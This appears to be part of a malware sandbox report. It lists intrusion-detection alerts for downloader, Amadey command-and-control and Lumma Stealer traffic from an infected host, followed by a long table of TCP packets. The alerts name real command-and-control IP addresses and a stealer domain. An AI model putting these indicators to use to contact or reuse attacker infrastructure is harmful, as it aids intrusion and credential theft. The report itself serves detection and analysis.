2024-12-08T13:31:48.240293+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	49835	185.215.113.206	80	TCP
2024-12-08T13:31:50.405168+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	49835	185.215.113.206	80	TCP
2024-12-08T13:31:51.751980+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	49835	185.215.113.206	80	TCP
2024-12-08T13:31:53.269125+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	49835	185.215.113.206	80	TCP
2024-12-08T13:31:56.725423+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	49835	185.215.113.206	80	TCP
2024-12-08T13:31:57.975382+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	49835	185.215.113.206	80	TCP
2024-12-08T13:32:03.785611+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.6	49875	185.215.113.16	80	TCP
2024-12-08T13:33:06.013537+0100	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.6	50019	185.215.113.43	80	TCP
2024-12-08T13:33:10.453317+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.6	50031	185.215.113.16	80	TCP
2024-12-08T13:33:15.345654+0100	2057921	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz)	1	192.168.2.6	52822	1.1.1.1	53	UDP
2024-12-08T13:33:16.710833+0100	2057922	ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)	1	192.168.2.6	50045	104.21.16.9	443	TCP
2024-12-08T13:33:16.710833+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50045	104.21.16.9	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 8, 2024 13:31:05.849028111 CET	443	49713	20.198.119.84	192.168.2.6
Dec 8, 2024 13:31:05.849055052 CET	443	49713	20.198.119.84	192.168.2.6
Dec 8, 2024 13:31:05.849071026 CET	443	49713	20.198.119.84	192.168.2.6
Dec 8, 2024 13:31:05.849083900 CET	443	49713	20.198.119.84	192.168.2.6
Dec 8, 2024 13:31:05.849198103 CET	49713	443	192.168.2.6	20.198.119.84
Dec 8, 2024 13:31:05.855067968 CET	49713	443	192.168.2.6	20.198.119.84
Dec 8, 2024 13:31:05.879842043 CET	443	49712	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:05.880013943 CET	443	49712	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:05.880033016 CET	443	49712	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:05.880045891 CET	443	49712	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:05.880058050 CET	443	49712	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:05.880069971 CET	443	49712	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:05.880089998 CET	49712	443	192.168.2.6	40.126.53.11
Dec 8, 2024 13:31:05.880115986 CET	49712	443	192.168.2.6	40.126.53.11
Dec 8, 2024 13:31:05.880122900 CET	49712	443	192.168.2.6	40.126.53.11
Dec 8, 2024 13:31:05.888055086 CET	443	49712	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:05.888729095 CET	443	49712	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:05.888895988 CET	49712	443	192.168.2.6	40.126.53.11
Dec 8, 2024 13:31:05.896476030 CET	443	49712	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:05.896753073 CET	443	49712	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:05.896797895 CET	49712	443	192.168.2.6	40.126.53.11
Dec 8, 2024 13:31:05.904815912 CET	443	49712	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:05.955180883 CET	49712	443	192.168.2.6	40.126.53.11
Dec 8, 2024 13:31:05.974630117 CET	443	49713	20.198.119.84	192.168.2.6
Dec 8, 2024 13:31:06.404553890 CET	443	49713	20.198.119.84	192.168.2.6
Dec 8, 2024 13:31:06.407004118 CET	49713	443	192.168.2.6	20.198.119.84
Dec 8, 2024 13:31:06.407241106 CET	49713	443	192.168.2.6	20.198.119.84
Dec 8, 2024 13:31:06.407381058 CET	49713	443	192.168.2.6	20.198.119.84
Dec 8, 2024 13:31:06.528291941 CET	443	49713	20.198.119.84	192.168.2.6
Dec 8, 2024 13:31:06.528315067 CET	443	49713	20.198.119.84	192.168.2.6
Dec 8, 2024 13:31:06.530132055 CET	443	49713	20.198.119.84	192.168.2.6
Dec 8, 2024 13:31:06.961307049 CET	443	49713	20.198.119.84	192.168.2.6
Dec 8, 2024 13:31:07.002051115 CET	49713	443	192.168.2.6	20.198.119.84
Dec 8, 2024 13:31:07.196926117 CET	443	49713	20.198.119.84	192.168.2.6
Dec 8, 2024 13:31:07.252033949 CET	49713	443	192.168.2.6	20.198.119.84
Dec 8, 2024 13:31:07.393032074 CET	443	49713	20.198.119.84	192.168.2.6
Dec 8, 2024 13:31:07.395780087 CET	49713	443	192.168.2.6	20.198.119.84
Dec 8, 2024 13:31:07.518848896 CET	443	49713	20.198.119.84	192.168.2.6
Dec 8, 2024 13:31:07.548933029 CET	49673	443	192.168.2.6	173.222.162.64
Dec 8, 2024 13:31:07.705214024 CET	49674	443	192.168.2.6	173.222.162.64
Dec 8, 2024 13:31:07.923976898 CET	49672	443	192.168.2.6	173.222.162.64
Dec 8, 2024 13:31:07.968640089 CET	443	49713	20.198.119.84	192.168.2.6
Dec 8, 2024 13:31:08.017745972 CET	49713	443	192.168.2.6	20.198.119.84
Dec 8, 2024 13:31:09.463385105 CET	49712	443	192.168.2.6	40.126.53.11
Dec 8, 2024 13:31:09.463449001 CET	49712	443	192.168.2.6	40.126.53.11
Dec 8, 2024 13:31:09.469630003 CET	49716	443	192.168.2.6	40.126.53.11
Dec 8, 2024 13:31:09.469664097 CET	443	49716	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:09.469799995 CET	49716	443	192.168.2.6	40.126.53.11
Dec 8, 2024 13:31:09.469938993 CET	49716	443	192.168.2.6	40.126.53.11
Dec 8, 2024 13:31:09.469954967 CET	443	49716	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:09.478946924 CET	49717	443	192.168.2.6	40.126.53.11
Dec 8, 2024 13:31:09.478984118 CET	443	49717	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:09.479043961 CET	49717	443	192.168.2.6	40.126.53.11
Dec 8, 2024 13:31:09.479187965 CET	49717	443	192.168.2.6	40.126.53.11
Dec 8, 2024 13:31:09.479199886 CET	443	49717	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:09.582844019 CET	443	49712	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:09.582860947 CET	443	49712	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:09.582915068 CET	443	49712	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:09.582923889 CET	443	49712	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:09.582962036 CET	443	49712	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:10.062004089 CET	443	49712	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:10.062156916 CET	443	49712	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:10.062233925 CET	49712	443	192.168.2.6	40.126.53.11
Dec 8, 2024 13:31:10.066088915 CET	443	49712	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:10.066184044 CET	443	49712	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:10.066241980 CET	49712	443	192.168.2.6	40.126.53.11
Dec 8, 2024 13:31:10.074479103 CET	443	49712	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:10.074534893 CET	443	49712	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:10.074619055 CET	49712	443	192.168.2.6	40.126.53.11
Dec 8, 2024 13:31:10.082887888 CET	443	49712	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:10.082986116 CET	443	49712	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:10.083045006 CET	49712	443	192.168.2.6	40.126.53.11
Dec 8, 2024 13:31:10.091376066 CET	443	49712	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:10.091510057 CET	443	49712	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:10.091595888 CET	49712	443	192.168.2.6	40.126.53.11
Dec 8, 2024 13:31:10.539693117 CET	49718	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:10.539753914 CET	443	49718	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:10.539827108 CET	49718	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:10.549460888 CET	49718	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:10.549483061 CET	443	49718	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:11.316087008 CET	443	49716	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:11.316165924 CET	49716	443	192.168.2.6	40.126.53.11
Dec 8, 2024 13:31:11.323786020 CET	443	49717	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:11.323848963 CET	49717	443	192.168.2.6	40.126.53.11
Dec 8, 2024 13:31:11.344249010 CET	49716	443	192.168.2.6	40.126.53.11
Dec 8, 2024 13:31:11.344268084 CET	443	49716	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:11.344504118 CET	443	49716	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:11.345145941 CET	49716	443	192.168.2.6	40.126.53.11
Dec 8, 2024 13:31:11.345176935 CET	49716	443	192.168.2.6	40.126.53.11
Dec 8, 2024 13:31:11.345208883 CET	443	49716	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:11.347760916 CET	49717	443	192.168.2.6	40.126.53.11
Dec 8, 2024 13:31:11.347781897 CET	443	49717	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:11.348006964 CET	443	49717	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:11.348444939 CET	49717	443	192.168.2.6	40.126.53.11
Dec 8, 2024 13:31:11.348503113 CET	49717	443	192.168.2.6	40.126.53.11
Dec 8, 2024 13:31:11.348537922 CET	443	49717	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:12.014118910 CET	443	49716	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:12.014137030 CET	443	49716	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:12.014157057 CET	443	49716	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:12.014208078 CET	49716	443	192.168.2.6	40.126.53.11
Dec 8, 2024 13:31:12.014225960 CET	443	49716	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:12.014235020 CET	49716	443	192.168.2.6	40.126.53.11
Dec 8, 2024 13:31:12.014679909 CET	49716	443	192.168.2.6	40.126.53.11
Dec 8, 2024 13:31:12.014767885 CET	49716	443	192.168.2.6	40.126.53.11
Dec 8, 2024 13:31:12.014910936 CET	443	49716	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:12.014934063 CET	443	49716	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:12.014985085 CET	49716	443	192.168.2.6	40.126.53.11
Dec 8, 2024 13:31:12.025396109 CET	443	49717	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:12.025419950 CET	443	49717	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:12.025469065 CET	443	49717	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:12.025479078 CET	49717	443	192.168.2.6	40.126.53.11
Dec 8, 2024 13:31:12.025501013 CET	443	49717	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:12.025513887 CET	443	49717	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:12.025537968 CET	49717	443	192.168.2.6	40.126.53.11
Dec 8, 2024 13:31:12.025563955 CET	49717	443	192.168.2.6	40.126.53.11
Dec 8, 2024 13:31:12.025777102 CET	49717	443	192.168.2.6	40.126.53.11
Dec 8, 2024 13:31:12.025794029 CET	443	49717	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:12.025805950 CET	49717	443	192.168.2.6	40.126.53.11
Dec 8, 2024 13:31:12.025810003 CET	443	49717	40.126.53.11	192.168.2.6
Dec 8, 2024 13:31:12.246972084 CET	49719	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:12.246989012 CET	49720	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:12.247018099 CET	443	49720	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:12.247025013 CET	443	49719	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:12.247102022 CET	49720	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:12.247275114 CET	49719	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:12.247740030 CET	49720	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:12.247750044 CET	443	49720	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:12.247792006 CET	49719	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:12.247807980 CET	443	49719	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:12.286622047 CET	443	49718	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:12.286686897 CET	49718	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:12.338264942 CET	49718	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:12.338283062 CET	443	49718	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:12.338531017 CET	443	49718	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:12.338583946 CET	49718	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:12.340153933 CET	49718	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:12.340174913 CET	443	49718	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:12.965272903 CET	443	49718	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:12.965295076 CET	443	49718	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:12.965375900 CET	443	49718	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:12.965401888 CET	49718	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:12.965430021 CET	49718	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:13.628695965 CET	49718	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:13.628716946 CET	443	49718	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:13.974725962 CET	49721	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:13.974761009 CET	443	49721	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:13.974828005 CET	49721	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:13.975022078 CET	49721	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:13.975034952 CET	443	49721	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:13.982624054 CET	443	49719	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:13.982688904 CET	49719	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:13.983184099 CET	443	49720	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:13.983241081 CET	49720	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:13.988763094 CET	49720	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:13.988778114 CET	443	49720	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:13.988945007 CET	49720	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:13.988956928 CET	443	49720	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:13.989007950 CET	443	49720	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:13.989010096 CET	49719	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:13.989029884 CET	443	49719	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:13.989056110 CET	49720	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:13.989145994 CET	49719	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:13.989152908 CET	443	49719	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:13.989278078 CET	443	49719	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:13.989345074 CET	49719	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:14.514512062 CET	443	49719	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:14.514529943 CET	443	49719	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:14.514578104 CET	49719	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:14.514600992 CET	443	49719	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:14.514614105 CET	49719	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:14.514647007 CET	49719	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:14.515278101 CET	49719	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:14.515317917 CET	443	49719	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:14.515350103 CET	443	49719	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:14.515367985 CET	49719	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:14.515392065 CET	49719	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:14.565046072 CET	443	49720	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:14.565068007 CET	443	49720	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:14.565080881 CET	443	49720	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:14.565100908 CET	49720	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:14.565152884 CET	49720	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:14.565159082 CET	443	49720	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:14.565205097 CET	49720	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:14.727242947 CET	443	49720	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:14.727334023 CET	49720	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:14.727349997 CET	443	49720	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:14.727394104 CET	49720	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:14.728192091 CET	49720	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:14.728224039 CET	443	49720	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:14.728272915 CET	49720	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:14.842596054 CET	49722	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:14.842622042 CET	443	49722	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:14.843986034 CET	49722	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:14.847868919 CET	49722	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:14.847881079 CET	443	49722	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:14.948679924 CET	49723	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:14.948713064 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:14.949064970 CET	49723	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:14.949450016 CET	49723	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:14.949465990 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:15.716136932 CET	443	49721	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:15.716450930 CET	49721	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:15.744596958 CET	49721	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:15.744609118 CET	443	49721	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:15.745242119 CET	49721	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:15.745246887 CET	443	49721	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:16.334734917 CET	443	49721	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:16.334752083 CET	443	49721	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:16.334810019 CET	443	49721	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:16.334867954 CET	49721	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:16.334899902 CET	49721	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:16.379873037 CET	49721	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:16.379889011 CET	443	49721	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:16.600032091 CET	443	49722	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:16.600109100 CET	49722	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:16.609580040 CET	49722	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:16.609587908 CET	443	49722	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:16.609771013 CET	49722	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:16.609777927 CET	443	49722	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:16.609831095 CET	443	49722	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:16.609879971 CET	49722	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:16.685497046 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:16.685584068 CET	49723	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:16.694542885 CET	49723	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:16.694550991 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:16.694757938 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:16.706909895 CET	49723	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:16.718549967 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:16.747350931 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:16.837929010 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:16.838027000 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:16.839010954 CET	49724	80	192.168.2.6	185.215.113.206
Dec 8, 2024 13:31:16.898004055 CET	49725	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:16.898053885 CET	443	49725	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:16.898133039 CET	49725	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:16.898581982 CET	49725	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:16.898597956 CET	443	49725	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:16.958904982 CET	80	49724	185.215.113.206	192.168.2.6
Dec 8, 2024 13:31:17.002496958 CET	443	49722	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:17.002513885 CET	443	49722	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:17.002574921 CET	443	49722	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:17.002590895 CET	49722	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:17.002645016 CET	49722	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:17.004218102 CET	49722	443	192.168.2.6	20.223.36.55
Dec 8, 2024 13:31:17.004229069 CET	443	49722	20.223.36.55	192.168.2.6
Dec 8, 2024 13:31:17.161681890 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.161698103 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.161748886 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.161806107 CET	49723	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.161818027 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.161845922 CET	49723	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.161869049 CET	49723	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.246803999 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:17.246836901 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:17.246932983 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:17.247014999 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:17.247051001 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:17.247111082 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:17.247651100 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:17.247658968 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:17.247821093 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:17.247831106 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:17.247853041 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:17.247884035 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:17.248033047 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:17.248040915 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:17.248195887 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:17.253035069 CET	49726	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:17.253048897 CET	443	49726	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:17.253207922 CET	49727	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:17.253222942 CET	443	49727	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:17.253312111 CET	49729	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:17.253319979 CET	443	49729	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:17.253329992 CET	49730	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:17.253340960 CET	443	49730	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:17.253447056 CET	49728	443	192.168.2.6	150.171.27.10
Dec 8, 2024 13:31:17.253458977 CET	443	49728	150.171.27.10	192.168.2.6
Dec 8, 2024 13:31:17.298896074 CET	49673	443	192.168.2.6	173.222.162.64
Dec 8, 2024 13:31:17.337558985 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.337582111 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.337647915 CET	49723	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.337660074 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.337706089 CET	49723	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.388118982 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.388140917 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.388222933 CET	49723	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.388237953 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.388292074 CET	49723	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.396450996 CET	49674	443	192.168.2.6	173.222.162.64
Dec 8, 2024 13:31:17.518418074 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.518438101 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.518492937 CET	49723	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.518505096 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.518543959 CET	49723	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.518569946 CET	49723	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.550837994 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.550856113 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.550928116 CET	49723	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.550936937 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.550975084 CET	49723	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.573896885 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.573925972 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.573991060 CET	49723	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.573998928 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.574022055 CET	49723	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.574048996 CET	49723	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.595123053 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.595144987 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.595201015 CET	49723	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.595207930 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.595246077 CET	49723	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.611411095 CET	49672	443	192.168.2.6	173.222.162.64
Dec 8, 2024 13:31:17.700330973 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.700351000 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.700400114 CET	49723	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.700409889 CET	443	49723	13.107.246.63	192.168.2.6
Dec 8, 2024 13:31:17.700453043 CET	49723	443	192.168.2.6	13.107.246.63
Dec 8, 2024 13:31:17.700469017 CET	49723	443	192.168.2.6	13.107.246.63
